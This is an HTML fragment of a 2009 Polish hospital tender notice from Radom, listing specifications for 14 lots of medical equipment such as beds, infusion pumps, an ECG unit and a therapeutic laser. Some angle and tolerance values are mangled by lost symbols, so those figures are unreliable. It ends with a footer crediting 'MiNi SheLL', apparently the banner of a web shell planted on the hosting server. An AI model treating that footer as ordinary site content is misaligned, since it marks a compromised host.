<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych i Zaopatrzenia
ul. Lekarska 4 pok. nr 309A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2009 godzina 12:00, miejsce: Dział Zamówień Publicznych i Zaopatrzenia
ul. Lekarska 4 pok. nr 309A.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> łóżko szpitalne 3 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Parametry wymagane
1.		Łóżko szpitalne przeznaczone dla dorosłego pacjenta, na kołach jezdnych z centralną blokadą kół
2.		Wymiary:
a)	szerokość łóżka:   965 - 1000 mm
b)	długość łóżka:    2100 - 2200 mm
c)	wysokość leża:     500 ? 5 mm
3.		Leże dwusegmentowe, wypełnione metalową, odejmowaną kratą.
4.		Rama leża: podwozie oraz segmenty leża wraz z siatkami wykonane z profili stalowych, pokrytych lakierem proszkowym.
5.		Sekcja oparcia pleców regulowana za pomocą przekładni ręcznej wspomaganej sprężyną gazową.
6.		Szczyty łóżka wypełnione płytą wodoodporną -  kolor do uzgodnienia.
7.		Zabezpieczenia przed uderzeniami w postaci krążków oraz listew odbojowych.
8.		Po obydwu stronach łóżka wieszaki do mocowania dodatkowego wyposażenia.
9.		Wyposażenie:
a). po obu stronach łóżka odejmowane poręcze boczne, chromowane, zabezpieczające przed wypadnięciem pacjenta
b). wieszak kroplówki
c). materac - wysokość 10 cm, w pokrowcu z tkaniny nieprzemakalnej, paraprzepuszczalnej
10.		Gwarancja (min. 12 miesiące).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> inhalator 2 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Parametry wymagane
1.	Aktywowany wdechem - średnio 1ml/min
2.	Zasilanie 230V lub bateryjnie
3.	Waga max 60g
4.	Wyposażenie podstawowe: 
- ustnik
- wężyk
- nebulizator kompatybilny z zaoferowanym inhalatorem.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.72.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> pompa infuzyjna 3 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Parametry wymagane
1.		Zasilanie sieciowe
2.		Całkowita masa pompy wraz z akumulatorami do 3 kg
3.		Wewnętrzne zasilanie akumulatorowe (min. 8h dla 5ml/h)
4.		Zacisk do stojaka o rozmiarach standardowych
5.		Prędkość podawania (minimalny zakres) od 0,1 do 1200ml/h (programowana co 0,1ml w zakresie 0,1-99,9 ml/h)
6.		Możliwość programowania pompy w różnych jednostkach: objętości, masy oraz z uwzględnieniem masy ciała pacjenta
7.		Programowanie objętości infuzji w zakresie 0,1 do 999 ml
8.		Możliwość programowania profili pracy pompy (np. propofol)
9.		Programowana szybkość i objętość bolusa
10.		Szybkość bolusa min. 1200 ml/h
11.		Dokładność +/- 2%
12.		Alarmy:
a) Złego zamocowania strzykawki
b) Okluzji
c) Końca wlewu
d) Pustej strzykawki
e) Wyładowanych akumulatorów
f) Błędu podaży
g) Brak aktywności przez 3 min.
13.		Funkcja KVO
14.		Klawiatura numeryczna
15.		Zmiana prędkości podaży bez konieczności zatrzymywania pracy pompy oraz możliwość zablokowania tej funkcji
16.		Możliwość blokowania parametrów hasłem
17.		Pompa wyposażona w wewnętrzną listę leków (min. 15) oraz możliwość dopisywania nazw leków przez użytkownika
18.		Programowania progów ciśnienia okluzji min. 5 progów
19.		Redukcja ciśnienia w układzie w przypadku osiągnięcia progu alarmu okluzji.
20.		Automatyczne rozpoznawanie rozmiaru strzykawki
21.		Możliwość stosowania strzykawek w rozmiarach min. 10,20,30,50/60 ml
22.		Możliwość stosowania strzykawek wielu producentów (min. trzech polskich)
23.		Funkcja pauzy
24.		Instrukcja obsługi w jęz. polskim i szkolenie personelu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.41.10-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> pompa żywieniowa 3 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Parametry wymagane
1.		Zasilanie sieciowe
2.		Wewnętrzne zasilanie akumulatorowe
3.		Wyświetlanie danych cyfrowych
4.		Zacisk do stojaka o rozmiarach standardowych
5.		Programowanie prędkości 1 ml/h do 200 ml/h
6.		Programowanie wielkości dawki
7.		Dokładność podaży min +/- 10%.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.41.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> aparat AMBU 1 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Parametry techniczne
1.	Worek reanimacyjny 1600 ml 
2.	Zbiornik na tlen (2600 ml). 
3.	Maska. 
4.	Przewód tlenowy. 
5.	Komplet rurek ustno-gardłowych. 
6.	Trwała plastikowa walizka..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.77.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> aparat EKG 1 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Parametry techniczne
1.		Aparat 3, 6 i 12 kanałowy
2.		Praca w trybie Auto i Manual
3.		Klawiatura alfanumeryczna
4.		Detekcja stymulatora serca
5.		Wyświetlacz graficzny prezentujący przebieg min 3 kanałów
6.		Liniowa głowica termiczna, automatyczna regulacja linii izoelektrycznej
7.		Filtracja zakłóceń sieciowych i mięśniowych
8.		Sygnał EKG - 12 odprowadzeń standardowych
9.		Czułość: 2,5/5/10/20 mm/mV
10.		Prędkość zapisu 25/50 mm/s
11.		Rodzaj i szerokość papieru
12.		Zasilanie 90-240 V, 50-60 Hz, wbudowany akumulator
13.		Funkcja rejestracji danych pacjenta
14.		Prosty w obsłudze, poręczny, łatwy w transporcie, umieszczony na wózku
15.		Wyposażenie dodatkowe: przewód sieciowy, kabel EKG, papier EKG, wózek EKG.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.15.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> leżanka 5 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Parametry techniczne
1.	Regulacja kąta nachylenia zagłówka
2.	Konstrukcja metalowa 
3.	Materac bezszwowy, wypełniony miękką pianką.
4.	Obciążenie min. 120 kg
5.	Odporność na działanie środków dezynfekcyjnych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> materac zmiennociśnieniowy 6 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Parametry techniczne
1.		System pracy zmiennociśnieniowy. Komory kołyskowe umieszczone w kilkunastu rzędach winny napełniać się powietrzem i opróżniać na przemian (co druga) w cyklu 10-minutowym. Materac wykonany z elastycznego  poliuretanu (nieusztywnionego) zapewniającego wieloletnie użytkowanie, zbudowany z poprzecznych odpinanych komór o wysokości powyżej 11 cm. Rozmiary materaca dostosowane do standardowego łóżka szpitalnego.
2.		Ciśnienie wywierane na ciało pacjenta przez materac w granicach 20-70 mmHg, regulowane ręcznym manometrem w zależności od wagi i pozycji pacjenta.
3.		Materac zapewniający nacisk na ciało leżącego poniżej 20mmHg w czasie przynajmniej 50% cyklu pracy materaca-do potwierdzenia wykresem zmian ciśnienia w czasie jednego pełnego cyklu, w jednej komorze materaca, przy regulatorze ustawionym na co najmniej 40% zakresu regulacji ciśnienia.
4.		Maksymalna waga pacjenta do 140 kg
5.		Materac wyposażony w zasilacz pneumatyczny zawieszany na ramie łóżka z możliwością ustawienia na podłodze, posiadającą wskaźniki sygnalizujące:
- pracę materaca
- brak właściwego ciśnienia z sygnalizacją świetlną i dźwiękową
- przerwy w zasilaniu prądem
6.		Materac pokryty odpinanym pokrowcem przepuszczającym parę wodną i powietrze, a zatrzymującym ciecze, wykonanym z dzianiny rozciągliwej we wszystkich kierunkach, zawierającego środki bakterio- i grzybobójcze oraz elektrostatyczne.
7.		Materac kładziony na standardowy materac szpitalny.
8.		Możliwość transportu pacjenta na materacu pozbawionym zasilania w czasie  ok. 1 godz.
9.		Możliwość szybkiego spuszczenia powietrza. Materac zaopatrzony w zawór CPR.
10.		Możliwość wielokrotnego mycia, dezynfekcji i sterylizacji..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.31.12-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> myjnia dezynfektor 2 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Parametry wymagane
1.		Sterowanie mikroprocesorowe
2.		Wyświetlacz ciekłokrystaliczny (LCD) z komunikatami tekstowymi
3.		Model wiszący na ścianie
4.		Szerokość urządzenia max. 600 mm
5.		Głębokość myjni max. 500 mm
6.		Podgrzewanie elektryczne, wbudowana wytwornica pary
7.		Dezynfekcja termiczna 
8.		Drzwi uchylne, otwierane do przodu 
9.		Automatyczne otwieranie i zamykanie drzwi za pomocą pedału nożnego
10.		Automatyczne dozowanie detergentu
11.		Końcowe schładzanie wsadu zimna wodą
12.		Obudowa ze stali nierdzewnej
13.		Kondensacja oparów
14.		Minimalny załadunek komory: 2 baseny lub 3 kaczki 
15.		Załadunek komory powyżej 2 basenów
16.		Ilość programów mycia i dezynfekcji dostępnych z panelu sterującego
17.		Możliwość zmiany programów myjących przez użytkownika 
18.		Możliwość mycia innego wyposażenia (m. in. (butle ssaków, miski, wiadra, itp.)
19.		Miejsce na pojemniki środków chemicznych (poj. 5 litrów) w myjni, min. 1 pojemnik
20.		Komunikaty wyświetlane w języku polskim
22.	Zasilanie elektryczne max. 10kW.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.11.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> łóżko elektryczne egerton 29 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Parametry techniczne
1.	Łóżko rehabilitacyjne wielofunkcyjne elektryczne - do ogólnej pielęgnacji z możliwością rehabilitacji
2.	Konstrukcja nośna z profili stalowych pokrytych lakierem - segmenty leża wypełnione stalową kratą (dopuszcza się konstrukcję łóżka ramową umożliwiającą zamontowanie podwójnej ramy wyciągowej (rehabilitacyjnej)
3.	Ramy szczytów łóżek chromowane (szczyty o wym. 40-50 cm)
4.	Barierki boczne chromowane - na całej długości leża (lub pokrywające 75% długości leża) o wym. w granicach 37-50 cm
5.	Szerokość całkowita z odbojami 96-104 cm
6.	Długość całkowita z odbojami 205-221 cm
7.	Leże łóżka czterosegmentowe, w tym trzy segmenty ruchome
8.	Elektryczne regulacje - regulacja wysokości łóżka 45-80 cm lub 42-77,5 cm lub 43-80,5 cm, regulacja segmentu oparcia pleców 700
9.	Pozycja Trendelenburga około 150, pozycja anty-Trendelenburga minimum 50 (dopuszcza się pozycję anty-Trendelenburga minimum do 120).
10.	Regulacja segmentu podudzia - ręczny mechanizm zapadkowy
11.	Regulacja segmentu uda (dopuszcza się elektryczną regulację segmentu uda)
12.	Cztery koła jezdne z centralną dźwignią blokady kół. Jedno z kół posiada blokadę kierunkową umożliwiającą jazdę na wprost
13.	Szczyty łóżka z możliwością łatwego wyjmowania z ramy leża wykonane z płyty laminowanej (możliwość wyboru koloru szczytów)
14.	Rama łóżka posiadająca elementy zabezpieczające lóżko przed obiciem, tj. 4 krążki umieszczone na szczytach i 2 listwy odbojowe po bokach łóżka (dopuszcza się łóżko bez listew odbojowych)
15.	Funkcja CPR, tj. awaryjna mechaniczna możliwość uzyskania pozycji półpłaskiej (reanimacyjnej) oparcia pleców
16.	Funkcja autoregresji segmentu oparcia pleców, która zapobiega  przed zsuwaniem się pacjenta z łóżka
17.	Pilot przewodowy sterujący z możliwością blokad funkcji leża (dopuszcza się łóżko posiadające przycisk natychmiastowego wyłączenia wszystkich funkcji elektrycznych)
18.	Zintegrowane przedłużenie leża do 20 cm wypełnione dodatkowym materacem
19.	Dodatkowe wyposażenie do każdego łóżka:
-	uchwyt do kroplówek przy szczycie łóżka (chromowany)
-	uchwyty na worek do cewnika, kaczkę, basen
-	wysuwana zintegrowana półka na pościel (lakierowana)
-	kosz do ułożenia ciapów pacjenta
-	uchwyt do podwieszania kabla elastycznego i uchwyt na pilot do obsługi elektrycznej łóżka (dopuszcza się rozwiązanie konstrukcyjne polegające na zintegrowaniu z pilotem przewodowym elastycznego uchwytu umożliwiającego powieszenie pilota na poręczach bocznych, ramach szczytów, ramie leża oraz innych elementach wyposażenia dodatkowego łóżka)
-	materac z pianki poliuretanowej o wysokiej gęstości: grubość około 100mm, w pokrowcu nieprzemakalnym, zmywalnym, paroprzepuszczalnym, przystosowanym do dezynfekcji,
-	materac antyodleżynowy zmiennociśnieniowy, wysokość ok. 12 cm z systemem CRP (szybkiego wypuszczania powietrza).
-	wysięgnik z uchwytem do ręki mocowany po obu stronach wezgłowia - 2 szt.
20.	Gwarancja min. 24 miesiące	
21.	Dopuszcza się maksymalne obciążenie robocze na poziomie 230 kg (parametr nie wymagany)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ssak elektryczny 2 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Parametry techniczne
1.		Wymiary zewnętrzne (wys. x szer. X gł.) [mm]
2.		Zasilanie AC 230V, 50 Hz +/- 10%
3.		Pobór mocy do 100 W
4.		Kabel zasilający ok. 2,00 m
5.		Czas pracy > 240 min. bez wyłączania przy nominalnym napięciu i w zależności od warunków środowiska
6.		Waga do 18 kg
7.		Podstawa jezdna z dwoma hamowanymi kołami
8.		Wyłącznik nożny 
9.		Wydajność ssania min. 30  l/min
10.		Poziom hałasu poniżej 45dB
11.		Maks. podciśnienie - 85 kPa
12.		Pojemnik z możliwością sterylizacji, o średnicy max. 11 cm, z nietłukącego tworzywa, o pojemności 2000 ml, z podziałką co 25 ml, do pomiaru zawartości - 2 szt/ssak
13.		Wkłady jednorazowe dwulitrowe, o średnicy 11 cm - 20 szt./ssak
14.		Dren silikonowy do pacjenta
15.		Wszystkie elementy ssaka łatwe do utrzymania w czystości
16.		Zabezpieczenie przed przelaniem pompy.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> laser terapeutyczny 1 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Parametry (funkcja) wymagane
1.	Sonda czerwona  (światło widzialne) 
685 nm (długość fali) 
50 mW (moc)
2.	Sonda podczerwona (światło niewidzialne) 
830 nm (długość fali)
400 mW (moc)
3.	Sonda prysznicowa (łączona IR + R) 
4 x 50 mW /685 nm
4 x 400 mW /830 nm
4.	Tryb pracy 
Ciągły
Impulsowy  0,1 - 10000 Hz (płynna regulacja)
	
5.	Typ lasera - półprzewodnikowy
6.	Klasa lasera - 3B
7.	Regulacja mocy - 20 - 100 %
8.	Ekran dotykowy 
9.	Kartoteka (baza danych) pacjentów w pamięci aparatu
10.	Bank programów terapeutycznych zapisanych w pamięci aparatu (gotowe diagnozy)
11.	Możliwość tworzenia i zapisywania własnych programów terapeutycznych
12.	Możliwość przypisywania terapii do pacjenta i zapisywania w pamięci aparatu
13.	Częstotliwości Nogiera i EAV
14.	Autotest podłączonych sond laserowych
15.	Wysięgnik do sondy prysznicowej
16.	Specjalistyczny stolik do aparatu o stabilne konstrukcji
17.	Okulary ochronne - 2 szt.
18.	Obsługa aparatu oraz instrukcja w języku polskim
19.	Zasilanie - 230V/50-60 Hz.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.91.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> aparat do krioterapii 1 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Parametry wymagane
1.		Aparat do kriostymulacji, z obudową mieszczącą 10 litrową butlę syfonową, pracujący w systemie CO2
2.		Obudowa - jezdna - na kółkach
3.		Ciepła, izolowana dysza nadmuchowa
4.		Elastyczny przewód zasilający umożliwia swobodną manipulację dyszą podczas zabiegu
5.		Trzy rodzaje dysz nadmuchowych: duża, średnia, mała
6.		Wskaźnik temperatury każdej dyszy
7.		Przewód pneumatyczny do dyszy oraz butli
8.		Złącze butli z filtrem
9.		Zapasowa butla na CO2
10.		Zapasowe uszczelki CO2
11.		Zapasowy wkład filtra
12.		Pełna gwarancja przez okres min.2 lat od daty zakupu. W tym okresie Zamawiający nie ponosi żadnych kosztów napraw i przeglądów sprzętu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.50.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> stół zabiegowy 4 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Parametry wymagane
1	Stół przeznaczony do przeprowadzania zabiegów opatrunkowych i prostych zabiegów chirurgicznych
2	Blat stołu zawiera, co najmniej 4 segmenty: podgłówek, oparcie pleców, oparcie bioder i podnóżek (dwuczęściowy)
3	Segmenty blatu stołu pokryte materacami bezszwowymi, wypełnionymi miękką pianką
4	Konstrukcja stołu przystosowana do monitorowania pacjenta i wykonywania zdjęć RTG
5	Metalowe elementy konstrukcyjne stołu wykonane ze stali nierdzewnej. 
6	Całkowita długość blatu stołu: 2000-2100mm
7	Całkowita szerokość blatu stołu: 550-600mm
8	Stół wyposażony w przejezdną podstawę z centralną blokadą wszystkich kół.
9	Regulacja wysokości stołu w zakresie min. 800-1000mm, przy użyciu nożnej pompy hydraulicznej.
10	Ustawianie segmentów blatu stołu wspomagane sprężynami gazowymi.
11	Pozycja Trendelenburga blatu stołu regulowana w zakresie min. 0-30o
12	Pozycja anty-Trendelenburga blatu stołu regulowana w zakresie min. 0-10o
13	Regulacja nachylenia segmentu oparcia pleców w zakresie min. 0-80o
14	Regulacja nachylenia segmentu podgłówka w zakresie min. 0-40o
15	Regulacja nachylenia segmentu podnóżka (każdej części) w zakresie min. 0-90o
16	Odporność wszystkich elementów stołu na działanie środków dezynfekcyjnych.
17	Stół wyposażony, w co najmniej: wieszak kroplówki 
(1 szt.), podpora ręki (2 szt.), ramka ekranu (1 szt.).
18	Konstrukcja stołu przystosowana do zainstalowania wyposażenia dodatkowego, znajdującego się w programie produkcyjnym producenta, dobieranego w zależności od potrzeb (np. dla zabiegów ortopedycznych, proktologicznych, laryngologicznych itp.)
19	Dopuszczalne obciążenie blatu stołu: min. 200kg.
20	Masa stołu: max 150kg..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.22.10-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com